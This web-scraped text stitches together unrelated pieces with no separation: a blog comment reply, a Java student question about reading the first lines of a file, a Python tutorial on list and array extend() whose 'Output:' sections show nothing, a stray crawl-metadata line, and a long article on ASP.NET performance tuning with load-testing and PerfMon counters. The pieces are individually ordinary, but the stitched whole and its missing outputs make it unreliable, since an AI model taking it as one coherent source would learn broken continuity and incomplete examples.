@tabletki na odchudzanie-> thank you so much… We are working more on Android, iPhone and other related stuffs… we will update with other useful resources from these… Keep in touch… and once again thank you for your support… 🙂
its nice.
i need to display that text in the emulator. can anyone help me?
Write a class named FileDisplay with the following methods:
1.) constructor: the class's constructor should take the name of a file as an argument.
2.) displayHead: This method should display only the first five lines of the file's contents
Here is the following code I have made so far
import java.io.*;

public class FileDisplay
{
    private String filename;

    public FileDisplay(String Filename) throws IOException
    {
        filename = Filename;
        FileWriter file = new FileWriter(filename);
        PrintWriter fout = new PrintWriter(filename);
    }

    public void displayHead()
    {
    }
}
First, in my constructor I have taken in an argument and used that argument to open an output file. Meanwhile, I'm trying to work on the displayHead method to print out information and to read data. I haven't opened my input file yet, and I don't understand how I can read and print data to an output file. Do I need to create another instance of the FileWriter class to output data?

public void displayHead() {
    FileWriter file = new FileWriter(Filename);
}
--- Update ---
In simple words, suppose I want to display some messages in my output file from the displayHead method. Since I have already opened the file in the constructor, how do I use it in this method...
Introduction to Python Extend
extend is a useful feature in Python. The word comes up in two ways: as the object-oriented idea of extending a class (inheritance), and as a built-in method. This article focuses on the latter: extend() is a built-in method in Python that can be used with a list or array to add items to it, and it is closely related to the list's append method.

When we use the extend method on an array, it takes a second array and appends that array's elements to the end of the first. append works in a similar way, but append adds the second array as a single nested element, while extend does not create a nested array: it adds the elements of the second array to the first individually.
Syntax:
array_one.extend(array_two)
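A quick sketch of that difference between extend and append (the variable names and values here are just for illustration):

```python
first = [1, 2, 3]
second = [4, 5]

extended = first.copy()
extended.extend(second)   # each element of second is added individually
print(extended)           # [1, 2, 3, 4, 5]

appended = first.copy()
appended.append(second)   # the whole list becomes a single nested element
print(appended)           # [1, 2, 3, [4, 5]]
```

Note that both methods modify the list in place and return None, which is why the results are read from the lists themselves.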
Examples of Python Extend
Examples of python extend are:
Example #1 – Extending an Array
Code:
import array as arr
arr1 = arr.array('i', [1,2,3,4])
arr2 = arr.array('i', [5,6,7])
arr1.extend(arr2)
print(arr1)
Output:
In the above program, we imported the array module under the alias 'arr'. We created two integer arrays, arr1 and arr2. Then we used the extend method, with arr1 as the main array, because we want to extend arr1 with the elements of arr2. We passed in the second array, and in the output you can see the elements of both arrays.
Example #2 – Extending a List
Code:
a = [1,2,3,4,5]
b = [6,7]
a.extend(b)
print(a)
Output:
In the above program, we created two lists, a and b, both holding integer elements. Then we extend list a with the elements of list b. In the output you can see all the elements of list b appended to list a.
Example #3
Code:
a = [2010,2011,2012]
b = ['john','doe',2013]
a.extend(b)
print(a)
Output:
In the above program, you can see that we created two lists; in the second list we added both integer and string values. The extend method works fine with integer and string elements mixed in the same list. As you can see in the output, the first list is extended.

The extend method only works if the argument passed is iterable, meaning it can be looped over. Even a list holding a single element is iterable. But if we pass a plain value directly to the extend method, it raises an error.
Example #4
Code:
a = [2010,2011,2012]
a.extend(5)
print(a)
Output:
As you can see, we passed a plain value instead of a list to the extend method, and it raised the error "object is not iterable". The value we passed was an integer; if we had passed a string, the extend method would have worked, because a string is a collection of characters.
Example #5
Code:
a = [2010,2011,2012]
a.extend("John")
print(a)
Output:
As you can see in the above example, we passed a string value instead of a list, and it still works. The extend method treats a string value as a collection of characters, and such collections are iterable; so we can say that strings are iterable. The output might not be what we wanted, as extend has separated the string into individual characters. If we had executed the above using the append method, we would have gotten the whole string as a single element, because append does not separate the string.
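The contrast described above can be demonstrated directly (illustrative values only):

```python
chars = [2010, 2011, 2012]
chars.extend("John")      # a string is iterable, so each character is added separately
print(chars)              # [2010, 2011, 2012, 'J', 'o', 'h', 'n']

whole = [2010, 2011, 2012]
whole.append("John")      # append keeps the string as one element
print(whole)              # [2010, 2011, 2012, 'John']
```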
Conclusion
The extend method is very useful when we already have an array or list and want to add more elements to it. With extend we can do this without inserting the elements one by one: it adds all of them in one go.
Recommended Articles
This is a guide to Python Extend. Here we discuss the Introduction of python extend along with different examples and its code implementation. you may also have a look at the following articles to learn more – | https://www.educba.com/python-extend/?source=leftnav | CC-MAIN-2021-04 | refinedweb | 715 | 73.58 |
CIM Studio
The easiest tool for browsing WMI is CIM Studio. CIM Studio is available as part of the WMI tools, which are available from the Microsoft Web site at.
After you install the WMI SDK, you can start CIM Studio from the WMI SDK program group. CIM Studio prompts you for the name of a namespace. If you are not sure which namespace to use, you can click Browse for Namespace. An explanation of how SMS uses WMI namespaces is listed in the "How SMS Uses WMI" section earlier in this appendix. In the Browse for Namespace dialog box, click Connect, and then click OK.
After selecting a namespace, a window appears. The left pane is the class explorer, which you can use to browse the class names. The right pane is the class viewer, which shows the properties of the currently selected class. You can also use the Methods tab to display the methods that are available for the class.
Table B.2 lists the commonly used buttons and icons for WMI CIM Studio.
Table B.2 Commonly Used CIM Studio Buttons
CIM Studio also includes the MOF Generator Wizard, which can save the definition of WMI objects as MOF files. If the objects are not computer-specific, the MOF files that are created by the MOF Generator Wizard can be transferred to another computer and compiled there to make the objects available on that computer as well.
For More Information
Did you find this information useful? Please send your suggestions and comments about the documentation to smsdocs@microsoft.com. | https://docs.microsoft.com/en-us/previous-versions/system-center/configuration-manager-2003/cc181062(v=technet.10)?redirectedfrom=MSDN | CC-MAIN-2020-10 | refinedweb | 262 | 72.05 |
This was a limited functionality..
**roadmap**, one feedback that our portfolios are down., down we go down from 11 to 1, and has its uses and governments making decisions that are interest-accumulating tokens from time to sift through the account says nothing at all., f this dip 👀, – socks5 proxy support, automatically enabled the ability to bring to the black hole.
How Do You Lose Money Buying And Selling Miota On Bittrex With Usd? 📝 verified contract: 0x01c858cecf9e96f4970aa2eee33cbd0cb2c39485, wassawassawassup!, don’t get me wrong..
hello fellow dogers..
no coinbase support not even look at their charts, get other countries, crippling slow transactions and blocks., 💎🙌 = hodl he’s holding all in for the long-haul..
how long does miota have a case number for your btc loses then you will lose all control over your money that i have received quite a bit more., and don’t just pay of the communities hearts..
🤣🤣🤣🤣🤣🤣🤣good one, 🚀💣 🔥**yeetin out of there as soon as they grow and explode in just 7 days.
join up!.
How To Withdraw Iota From Coinbase To Another Wallet On Coinbase? It’s just very early., \- 1% to the moderators., i have to pay a tax shelter..
do your own diligence., hold for as long as oil is cheap, plug-and-play and can make pretty reliable charts off of it will have on show., remember to dyor guys and make a miota node?.
if you are extremely early., 71.
according to him, the growth rate increases the value of traffic..
Guys credit card at miota atm?.
monero and monero community..
safest moonshot!.
this recent dip in doge, every time i noticed that as a stealth fair launch., i ran out of these things i am here to build a doge. a lot can happen i suppose…lol., website:.
How Do You Transfer Swipe From Coinbase To Bank Account From Cash App?
Welcome to shibaclassic🐕🦺🦮. . enter beacon, $bcn., 📊 $sfcn tokenomics 📊, total supply 1,000,000,000,000,000 safewin. however, every time i had a strong token metrics..
irc is decentralized, for example.. read at.
here are their lives, be sure to read comments, particularly those who are downvoted, and warn your fellow redditors against scams., **#bsctrust #covid #btc #crypto**.
⭐ chart:, ✅ banner ads already – more are on the main telegram and ask me if i download a last gen game in the telegram in which block the word and help others and i can take a small loss and the binance situation is temporary, *i am a bot, and this action was performed automatically., the token is on pancakeswap v2!..
the only answer is no, the buying power to play live blackjack with 6 audits already filed and spent it., i built a raffle system that goes from .0000009 to .000001 for example, the longer they wait, the longer you stay, the better:, nice!, 📝contract:. anyone know why it is all factual as bellow!.
Locking liquidity, transaction tax, holder gets passive income on my ticket to the community from 100 to 50 right?, arrived on pancakeswap.
The team behind it and kept it for 6 months, as a matter of a bot.
disclosure, this is crazy..
why is miota worth in 2009?. it’s not a lot of things more clearly., —. officially added liquidity on pancake swap:. i bought a nano ledger s in ledger live., ridiculous..
luckily for you, brethren, beloved of the privacy crisis caused by a mile.
I think it’s 2 different things..
use tools such as and to help you determine if this project is legitimate, but do not solely rely on these tools., nah you see it on the surrondings..
fuck china 🚀 launched 18:00 utc, may 17 on pancakeswap, trustwallet to an irs inquiry., * some tips on using it even reach close to full., 💲 max supply: 1000 trillion, also if people are affected by what elon is trying to send it to create a strong community behind it, including things like this for short and long term investment, not a project, it’s an asian exchange and coinbase pro, web and mobile applications for every member of the hodler, that’s sexy., 4x-ed.
What Kind Of Currency Is Miota A Better Investment Than Ethereum? *i am a bot, and this action was performed automatically., dogeface taking over the old market it will all this good idea to buy lumens from old account just to have iota atm?, 🍬 cryptocandy is driven by a unique non-fungible token minted on ethereum involving staking nfts for us to be worth a try and go in!, bitcoin is falling, wait until the low .05’s..
square 1 is the combined knowledge of the same thing and i will see those diamond hands and focus on building a strong community now and forever!!!!!!.
Hello together,.
topic..
china sells., fud is making us aware of lobstr wallet.. binance partners with neblio to integrate into the telegram group reached out to us..
fortunecookie . cc.
I definitely do., your mothers should be live in the future of this., you will still be here regardless..
How To Convert Money Into Digitalbits Mining Needs Electricity? I guess time will come to a tesla., ripple legal clarity could trigger margin calls against amc., this feature allows you to withdraw it in simple terms.. *i am a bot, and this action was performed automatically.. one of the supply of rafflection will diminish over time., doxxed team. i don’t know about consensus, block validation on a universal ecosystem of web and looking at the same level, or even large transactions in the program.. how to buy $mutt, positivity, margaritas, and a half with crypto..
To tha moon!!!, we hold with 3% of each transaction incurs a 10% fee., haha thanks for the many, as well and will never mine their own apps to keep up with that right now, i’ve just came out clean…
#bitcoinblocksizematters, i put it short: this is huge news and good team efforts to secure by using the wallet before or is it just me?, yes i bought my first coin..
🔸contract: 0x6163ef2b923dc8cee61c94cef4a0344bcf374a08.
Safest moonshot!, i imagine the craziness if internet communities, crypto communities, memes creators would rally onto thecryptowall and fight against each other it could be your once-in-a-lifetime chance to convert your iota wallet in canada?.
———————————-, 5 days ago:, i have to go through this thread at all a dream!!, at .71 who thought if only this but 50 day delay seems excessive regardless of the total remittances in the finance of the matrix., once you have any additional steps.. i think it’s more fun to see +50% green than -30% red 😂 logic? none.. the links.
be sure to do now… you either make the same profile the other, but something that will allow you to join the bitcoin world like there is some bubble wrap.
If this makes it likely falls under one of the summer time will dogecoin still be deflationary., dca the microstrategy way!, some of us went to so many plans ahead and they are saying that my site is a scam/rug/honeypot until proven otherwise., uh i guess you could talk to..
The dogecoin ship?. how to get in now. 📝 verified contract: 0xfe761e37162a39d961caff519232309cb44f98e5, has anybody seen this movie 😂.
lol, whata fucking excuse., whale.. if you were going to disturb us!.
How Long Did It Take To Transfer Iota To Ethereum Mine With A Prepaid Card To Eur? What Is The Cryptocurrency Zilliqa A Real Currency An Economic Appraisal?. 💦 $moist 💦 token is right now, and interest for every bitcoin ever mined, it should be how it goes that’s true😅, charles hoskinson’s solution for multiple reasons., 1 doge = 1000 lovelace = 1000 lovelace = 1000 babbage.
Starlink mission represents the very few tokens to operate anonymously and use bch?.
sick of coins with a wholesome community that will be showcased at \- we are talking about., 🧱, 🛸 5% fee goes back to holders on the number 1 currency would really appreciate it., a non-fungible token is on pancakeswap v2!.
Through the exchange, according to the moon??. if they are proposing a private message to reddit..
.
if you purchase it from?. crafted to encourage users to obtain bitcoin.. btfd, amd tell your family member put it back, they are in circulation and this action was performed automatically., assume that every project posted is a scam or not.. hi guys, i feel ya., hello,doge.
How To Find Out How Many Th In A Iota Wallet Has The Most Eur? , **tokenomics**.
Hypermoon just fair launched to unsure fair distribution between investors., they’ve had a flood of holders across the web and mobile..
this things gonna blow up!!, anyone got a piece of hardware designed to be at his mercy., stop right there haha, i know this doesn’t meet guidelines..
on binance uk account as part of a god and shouldn’t be the happiest person., you hold tokens, we give hope with an initial recording of this?, lmao., i hope that doggie’s for sale today 😂.
that unlocked wallet is detached from lending platforms that have lower carbon emissions, that should be 100% correct on all tagz base pairs like bitcoin, ethereum, xrp, tether, tron, doge, or any of you are not buying more dips !. this is how i am having april flash backs.
On top of our tokens for 30 days., 🥞 pancakeswap:, 📝contract:. does it affect the economy?, * the dapp will be revealed on our side the deusche ethereum co creator of $ass tweeted us to swap on ledger..
if you receive private messages, be extremely careful..
How Much Is A Good Time To Invest In Blockchain Without Investing In Modefi? Demystifying the security debate around layer 2 of the first nft design completed and will be accepting #doge ?, **1% – marketing\***, there are **no** airdrops, giveaways, staking, inflation mechanisms, or *’free lumens’*., ❤️, super sale now on their exchanges to shake out everyone.. diamond hands & sold when you kinda love…😂🐾🌙🚀, i was watching one of the crypto community and become part of a iota?. the balance is overinflated in coinbase., can someone tell me the full amount of fiat by trading one crypto for around 230 dollar on dogecoin..
we all know what happened.
🚫 naughtyelonbsc launched 30 minutes to reach $1 in it….., 🛸 1% fee is included, the fee goes back into holders wallets.
Because of how the portfolio is down the fud work, not china, ltc would be caught in a single wealthy investor can go and get financial stress.. agreed; however, the wallet.dat folder in a day., doge-1: we have not used to purchase heavily discounted softwares to grow so people need to hodl farrk im glad better projects in the stock market?.
🔓 **lp** **lock**:. until they have something similar.. however i would suggest at least 10% of its token address?. i’m going to chinatown free tokens., 🚀.
How To Transfer Paypal Money To Venus Mine With Raspberry Pi? Honestly you gte be a built-in system for choosing the charity.*, thank you.
def interested in trading and cryptocurrency using an exchange, it is normal busd but swapped for $bad via smart contract.. so i don’t think so., my erection will go up., to buy some safepussy?. only keep the recovery phrase with anyone, never enter it on my crypto portfolio and realising i basically commit suicide.
* we strive to create an invoice for you to succeed more than 350 telegramm member and is putting up new opportunities and have fun!, cardo just fair launched now!🚀✨ safest moonshot!.
How To Find Out If I Have To Pay To Buy A Small Amount Of Miota Cash?
How To Get Your Money To Miota?
What Is Better Than Iota?
How To Take My Iota Offline?
Do You Receive Money From Miota?
What Happens When You Buy Miota On Ledger Nano S Support Usd Gold? A great and positive although new.
pound.
did he advice this team delivers as they purchase tickets and also cexes like binance, coinbase, and kraken., it is still classed as income, so the daily chart.. 🍪bitcookie🍪 is an indie project, it’s striving for **organic growth** it could easy run to 100k., never share your 24-word recovery phrase as a customer comes in pouches., how to create a coupons app.
What Is The Current Size Of The Following Is True About Rchain Quizlet?
How To Send Iota From Coinbase To Buy Money Other Than Coinbase? Where did you lose alot of coins u have a lot for any answer and i have this ready and launched in a few hours!, – anti whale-dump 5t transaction limit = 100 000 000 as mcap and not pre apportioned at all., it’s not a true hero.
Be sure to do your own bank, lending your litecoin in a request in coinbase pro has lower fees and medical expenses to the 4/5 charity multisig to seed our cryptocurrency, beyond will sell at 0.5., idk..
it went from $1.49 to $1.99 . that’s scary..
\- liquidity is locked and ownership renounced for your transferred crypto to become the next steps do i need is 51% of the protocol..
, monero is the very first fella in the window?.
buy the dips.. | https://fruitgift.eu/how-to-deposit-money-into-your-miota-hundredfold-in-a-roth-ira | CC-MAIN-2021-31 | refinedweb | 2,206 | 75.71 |
ASP.NET and the .NET Framework have given web developers a much larger toolbox to work with than they had with straight ASP. But as with any new language or technology, picking the correct tool for the job is sometimes more difficult than actually using the tools themselves. For example, you probably wouldn’t use a chainsaw to cut a copper pipe, and conversely you wouldn’t use a hacksaw to cut down a tree. But if you don’t know which tool to use, or how to figure out which tool is best suited for the job at hand, then you could make mistakes that cause your website to perform less than optimally.
With .NET, you have about 30 different ways to do just about anything. But the trick is to figure out which tool to use for what you are trying to accomplish. For most websites, it’s not a big deal if your code isn’t as efficient as possible. For informational sites or small E-Commerce web sites, it's forgivable if a page takes 5 to 6 seconds to load, but for an enterprise sized E-Commerce web site that has to handle a high volume of users, page performance can be the difference between the site still being open next year or not. For sites like these, where performance is vital to their survival, it is very important to take performance into consideration during every phase of the development cycle.
A web site can offer hundreds of categories, thousands of products, have the coolest graphics and use the latest technology, but all that is pretty much worthless if the pages don’t load fast. Most likely, there are several other web sites available that do exactly what yours does and the user will go elsewhere if their browsing experience isn’t snappy enough.
With the plethora of tools at web developers’ fingertips these days, it is very important that we know the pros and cons of each tool, as well as how to quantify which tool is best for each situation. After ASP.NET was released to the public, 1001 books were published showing how quick and easy web development was in this new .NET era. “Reduce time to market, decrease development costs, and increase scalability and maintainability with ASP.NET”. This was the marketing rally being broadcast from Redmond. But anytime you hear marketing verbiage like this, take it for what it is…marketing. Take it upon yourself to investigate, learn, profile, and quantify what is being hyped before you implement it in any piece of critical functionality.
This article is a culmination of ASP.NET performance best practices that the developers I have worked with and I have come up with while developing enterprise-scale web sites in ASP.NET. The title of the article also mentions ‘performance strategies’: I will be going over strategies that can be used during performance tuning to make the task more organized and meaningful. I also want to point out that this article demonstrates very little code, since I think (and hope) the discussion is clear enough for you to use to implement your own performance-related strategies.
So at what point in a project’s life cycle should the development team focus on code performance? The answer: Always, during every phase of the project lifecycle. Some development teams save performance tuning until the end of each release, or the entire project (if at all). They add sort of a ‘performance tuning phase’ into their development lifecycle. But in my opinion, I think this is a big mistake. If your team goes through their design and development phases without considering code performance, you will most likely find that several of your pages and algorithms are too slow to be released into production. The end result being you’ll have to redesign and recode them. This is a huge waste of time and will most likely push your release to production date. To help avoid this pitfall, performance should be a serious consideration throughout the entire project.
Now, I do believe that having a performance tuning phase at the end of each release is not a bad idea. But coding the functionality for the upcoming release, without taking into consideration the performance of the code, just because you have an official performance phase, can lead you into serious trouble.
A good time to implement a performance phase is to run it in parallel with the test phase. Pull a few developers off from the development team who are working on the bugs the test team finds, and have them totally focus on running performance analysis tools and tuning the code accordingly. An even better arrangement would be to have your test teams familiar with performance analysis tools and techniques, being able to find bottlenecks and inefficient memory usage themselves, logging these things as bugs and then letting the development team fix the problems. But this sort of arrangement isn’t very realistic in most companies.
One technique that can be used to help reduce the amount of time wasted redeveloping slow code is prototyping. Early in the project’s lifecycle, during the analysis, design and early development phases, you should create prototypes of critical pieces of functionality. And not just one prototype, but several different versions of the same functionality should be written. This way you can profile each one to see which is more efficient. The biggest mistake developers make, especially when using a new technology, is to learn just one way to code a piece of functionality and call it ‘good enough’. You should dig deep into the code, use timers and profilers, and find out which techniques are the most efficient. This strategy will take more time at first; extending your timeline during your first few projects, but eventually you will build your own toolbox of performance best practices to use in future projects.
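As a sketch of the kind of micro-benchmark harness that this prototyping approach implies — written in Python purely for illustration (the article's context is ASP.NET, and the two function names and the workload here are invented):

```python
import timeit

# Two candidate implementations of the same piece of functionality.
def version_a(data):
    result = ""
    for item in data:
        result += str(item)      # repeated string concatenation
    return result

def version_b(data):
    return "".join(str(item) for item in data)   # single join

# Profile both prototypes under an identical workload and compare.
data = list(range(1000))
for name, fn in [("concat-in-loop", version_a), ("join", version_b)]:
    elapsed = timeit.timeit(lambda: fn(data), number=200)
    print(f"{name}: {elapsed:.4f} seconds")
```

The point is not the specific numbers but the habit: write several versions of the critical functionality, time them under the same conditions, and only then call one ‘good enough’.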
There is one thing I want to bring up at this time that you should keep in mind. Performance shouldn’t overshadow any of the key ‘abilities’ in your projects. Extensibility, maintainability, usability, and complexity are all very important factors to keep in mind when designing and developing your site. It’s pretty easy (take it from me) to get caught up in performance profiling, tuning, and tweaking your code. You can always make your code go just a little bit faster, but there is a point that you have to call it good enough. This is the performance tuning version of ‘Analysis Paralysis’.
You should try to keep a good balance between all of the ‘abilities’. Sometimes creating a wicked fast page will come at the expense of maintainability and complexity. In these situations, you’ll have to weigh the benefit of the page speed verses the effort and time it will take to maintain and extend the page in the future. I always like using the ‘Hit by a bus’ analogy. If only one person on your team has the technical ability to code and maintain a piece of functionality, is that functionality really worth it? What will you do if that person is hit by a bus? What would you do then?
While analysts and architects are flushing out the site's requirements and creating their design documentation (UML diagrams hopefully), they should also try to keep performance in consideration while they design the site. Don’t just try to design the required functionality, but try to design the functionality to be as efficient as possible. For example, caching is a good performance consideration that can, and should, be designed for, well before the developers start coding. For example, designing your site to have the process call the database every time a user requests a page is not very efficient. A data caching strategy can be put in place, in the design of the site, to reduce the number of database hits. ASP.NET has a great caching mechanism built into it that you can take advantage of. Microsoft also has a Caching Application Block that has even more functionality if you need more advanced caching capabilities (MSDN).
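The data-caching strategy described above can be sketched in a language-neutral way. This is not the ASP.NET Cache API — it is a minimal Python illustration of the design idea, and the names SimpleCache, load_products, and the 60-second lifetime are all invented for this example:

```python
import time

class SimpleCache:
    """Minimal in-process cache with absolute expiration."""

    def __init__(self):
        self._store = {}  # key -> (value, expires_at)

    def insert(self, key, value, ttl_seconds):
        self._store[key] = (value, time.monotonic() + ttl_seconds)

    def get(self, key):
        entry = self._store.get(key)
        if entry is None:
            return None
        value, expires_at = entry
        if time.monotonic() >= expires_at:
            del self._store[key]   # expired: evict and report a miss
            return None
        return value

def load_products(cache, query_db):
    """Serve from cache when possible; hit the database only on a miss."""
    products = cache.get("products")
    if products is None:
        products = query_db()                          # the expensive call
        cache.insert("products", products, ttl_seconds=60)
    return products
```

With a design like this in place from the start, repeated page requests within the cache lifetime never touch the database, which is exactly the kind of decision that is cheap at design time and expensive to retrofit later.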
Hopefully the examples that I’ll show you in the later half of this article will give you some good ideas to use in the design of your next site.
Before you jump into your code performance tools and start tweaking your code, you need to plan out what you are going to do first. Without a good performance tuning plan and good procedures to follow, you could actually make your site run slower. First, divide the site up into strategic pieces. You should order each piece based on its relevance to making the site successful. Then performance tune each piece in this order. A smoking fast ‘Contact Us’ page does a site no good if the users are waiting 5 – 10 seconds to load a product page.
This is the order that I usually follow: Home page (a user won't use your site at all if you don’t load the home page fast), Search page and algorithm, Category and Product pages, checkout process, profile pages, and then customer service and ancillary pages. The reason for breaking up the site into phases like this is that you probably won’t have the luxury of spending time performance tuning the entire site. Deadlines will usually force you to pick and choose which pieces you should work on, and in that case you should work on the most critical pieces first.
If you have an existing site that you are either redesigning or upgrading, a good way to figure out which pages are the most critical to your site's success is to parse your web server log. Find a day that had a particularly high user volume and count the number of times each page was hit during that day. Most likely only about 10 or so pages will make up 90% of the user traffic on your site. This is a good place to start.
Now, before we really get into the nitty-gritty of performance tuning, there are a few more steps you should perform. First, you should identify what tools you will use to analyze the code and measure performance metrics. I’ll be going over a few tools in detail, a bit later.
Next, you need to identify what metrics you should be using to measure the site’s performance. Each tool comes with a myriad of metrics. You could research every metric available, but that would take forever. There are a few key metrics that are especially meaningful to site performance that you should be concerned with the most. I’ll be going over each of these as I discuss the different tools.
Once you know what tools you will be using (and how to use them) and what metrics you plan on using to measure site performance, you then need to take a baseline measurement of your site. You run this baseline to figure out where the site stands prior to applying any code optimizations. You’ll use this first baseline measurement to help you determine what numbers are acceptable for a production release and what kind of effort is needed in order to get there. The baseline will also help you figure out what parts of the site are fast enough, and what areas still need work.
The last thing you need to figure out before you fire up your profilers is the performance tuning methodology that you are going to follow as you go through the tuning process and make changes to your code. The methodology I usually follow has four basic steps. First, before you make any changes, record a metric baseline using the profiler or load-testing tool of your choice. Second, make ONE change. This doesn’t mean only change one line of code, but make only one fundamental change to your code, in one small area of your code (like one aspx page).
For example, suppose your code uses the StringBuilder to perform all string concatenation in your site, but you have developed a custom, optimized string concatenation class and you want to see if it is faster than the StringBuilder. Take one aspx page, change out all of the StringBuilder usages for your new custom class, and then run the tests. The point of one change is to make one fundamental change in one small area.
The reason you should only make one key change to your code is that you run the risk of contaminating your test scenario. Let's say you make three different types of changes in a page, but when you run your metrics, you find that there is no difference in the numbers, or maybe the changes actually slow the page down. The problem is that two of the changes you made may have made the page run faster, while the third change made the page slower, slow enough to negate the two beneficial changes.
The third step is to take another measurement of the page's metrics with the new changes, and evaluate the differences between the baseline and your new changes.
The fourth step is to log the results. This includes a description of the change you made, the numbers from the baseline, the numbers from your changes, and the differences. It is very important that you log and keep track of your progress while you are in the performance tuning phase of your project. This log will give you and the project’s manager a good idea as to where you are in your goal of getting the site ready for production. The performance log will also be very valuable for publishing a ‘lessons learned’ document at the end of your project, conveying performance best practices to other development teams.
To recap the steps you take when tuning your code: take a baseline measurement, make ONE fundamental change, take a new measurement, and log the results.
One final note: once a change has been identified as beneficial to the performance of a page, that change should be propagated out to the rest of the code in the project. But don’t just blindly make the changes. You should use the four-step approach for this too, just to make sure that the benefits you saw on one page are just as beneficial to the rest of the site.
There are dozens of tools that one can use to help with performance tuning, but most of them break down into two different types: profilers and load testers.
I’d like to talk about load testers first. You can spend up to several thousand dollars to purchase one of these tools, and there are many really good ones to choose from. The one I like the best (because I’m cheap and it’s free) is Microsoft’s Application Center Test (ACT), which comes with Visual Studio Enterprise edition. With ACT, you can record one page or a series of pages into a test script. When you run this script in ACT, it will call that script over and over again for a given period of time, and for a specific number of users. After the script has finished running, ACT will generate a report that shows the performance metrics for that script. Before running a test, you should figure out how many users you want your site to handle (which you can set in the properties of the test script). If your site is a highly used site, then think about starting out with 15 – 25 simultaneous users, and then as you tune your pages and they get faster, test with up to 50 – 75 users.
There are many reasons to test with a high number of users. First, you need to see what your processor is doing while your pages are being hit hard. If your test script is pegging the processor up to 90+ % with only 25 users, then you might have some efficiency issues with your code. Also, when running with a high number of users, you should monitor the % time the ASP.NET process is spending in garbage collection (how to get these counter results is explained below in the PerfMon section). A good guideline for % of time in garbage collection is to keep it less than 25% (which is pretty high in my opinion). Anything higher and the ASP.NET process is spending too much time cleaning up old objects and not enough time running the site. If the % time in garbage collection is high, you’ll need to take a look at how many objects you are creating, and try to figure out how your code can be rewritten to be more efficient (i.e. Not generating so many objects!).
A good example of this that I found (which I’ll talk about in greater detail later) is data binding to ASP.NET controls. We had a page that displayed a great deal of information, and the page was designed exclusively using data bound controls. The page ran ok with up to 10 users. But when we took the number of concurrent users up to 50, the processor pegged at 100% and the page became extremely unresponsive. What we found out was that the ASP.NET process was spending just over 30% of its time performing garbage collection!!!
In ACT, you can set how long you want the test to run, even up to several days if you want, or you can set it to run for a specific number of iterations. I prefer to run for a duration and see how many iterations of the test script I can get during that time period. Once a test run is finished, the results are stored and a report is generated. One of the nicest features ACT has is the ability to compare two or more test result reports against each other. You should use this to compare your baseline against several sets of new changes; this gives you an easy way to see what effect your code changes had on the performance of the pages. In its summary report, ACT gives a number of metrics that I like to monitor, such as requests per second, time to first byte (TTFB), and time to last byte (TTLB).
One important note: sometimes you may want to use ACT to run scripts on two different servers. For instance, you may want to test your latest code changes against the latest build on your test server. This is totally acceptable and commonly done, but this kind of test is only valid if the test server and your server have the same hardware specifications. Also, if your development server has the site code, database and web services all on it, but your test environment is set up as a distributed architecture, then this will also invalidate the test results. Though this may seem like common sense, I do think it's worth bringing up, so somebody doesn’t spend a week trying to get their P3 1.5 GHz dev box to perform as well as their P4 3.2 GHz test server.
Another tool that I really like (because again, I’m cheap and it's free) is the Performance Monitor tool that comes with the Windows NT family of operating systems (NT, 2000, XP Pro and 2003 Server). PerfMon is a tool that records and graphs the performance counters you choose while your code is running. When .NET gets installed on your development box, hundreds of .NET-specific counters are added to PerfMon. Not only that, but the .NET Framework gives you classes that you can use to write your own performance counters to monitor in PerfMon!
To see some of the counters that get installed with .NET, open up PerfMon by clicking Start | Programs | Administrative Tools | Performance. Once the application opens, right click on the graph window and click ‘Add Counters…’. In the Add Counters dialog box, click the ‘performance object’ combo box, and you will see about 60 or so different categories of performance counters. Select one of these categories, for instance the ‘.NET CLR Memory’ category, and you will then get a list of individual counters for this category. Click the 'Add' button to add these counters to PerfMon, so it'll start monitoring them. I’ll leave it up to you to read the provided help files and MSDN topics on the different counters, and on how to use PerfMon in general. One tip for learning what each counter means: in the 'Add Counters' dialog box, click the button called 'Explain'. This will extend the dialog box and give you an explanation of each performance counter that you click on. That should be your first step in figuring out what PerfMon has to offer. Another cool thing is that ACT can also record PerfMon counters during its script runs and show you the counter results in its own summary report. I find this is a good way to record the % time in garbage collection counter, as well as processor counters, while your tests are running.
There are so many different counters available in PerfMon that it can be a bit overwhelming at first. The counters I normally like to watch while I’m testing a piece of code are: % Processor Time (under Processor), Available MBytes (under Memory), % Time in GC and # Gen 2 Collections (under .NET CLR Memory), and # of Exceps Thrown (under .NET CLR Exceptions).
This isn’t an exclusive list of counters that I’ve used, but the base template that I use when using PerfMon. If you are using Remoting and/or web services, then there are categories in PerfMon for both. Also, there are very important IIS counters that PerfMon exposes, but I prefer to use ACT to gather IIS statistics.
I would like to say a few things about some of the counters I just mentioned. % Processor Time is one of the most important counters for you to monitor. If you are running a load testing tool with only 5 – 10 users and the % Processor Time is up around 80 – 90%, then you’ll need to reevaluate your code because it is working too hard. But if you are running 75+ users and the processor is up to 90%, then that’s to be expected.
"Available MBytes" is what I use to judge the memory efficiency of my sites. I haven’t really found a good way to find out exactly how much memory the ASP.NET process is taking up, but "Available MBytes" will give you a decent idea. Get PerfMon running and add this counter before you start running your load tester. Record how many megabytes of memory you have available, then start your test. While your test is running, watch "Available MBytes" as it goes down (if it goes up, then you just found the algorithm of the century!). At the end of your test, find the difference between how much memory you started with and how much was available just before the test ended. This is an important counter to measure if you have implemented some sort of caching strategy in your site, as your site could use too much memory, which will cause the ASP.NET process to recycle.
"Available MBytes" is also good for seeing if your code has a memory leak, especially if your code is calling legacy COM components. Create a load test that runs for 20 – 30 minutes and see if the "Available MBytes" counter settles around some constant value or keeps decreasing. If it keeps decreasing over 30 minutes or so, then there is a good chance you have a memory leak somewhere. And yes, it is still possible to create a memory leak, even in .NET. It’s just much harder.
"# Gen 2 Collections" is another metric that should be watched. Generation 2 collections are fairly expensive, and if your site is running a high number of them, then you need to take a look at your code and see if it is holding onto child object references longer than it should for some reason. This is a hard one to quantify, though, since there isn’t any recommended ratio of Gen 2 collections to Gen 1 and Gen 0 collections.
"# Exceptions Thrown" is also very important to monitor. It can tell you if your code is eating a high number of exceptions, which is also very costly. This can happen if your code uses try / catch blocks in order to direct process flow instead of just catching errors. This is a bad practice that I often see and I’ll discuss a little bit about it later.
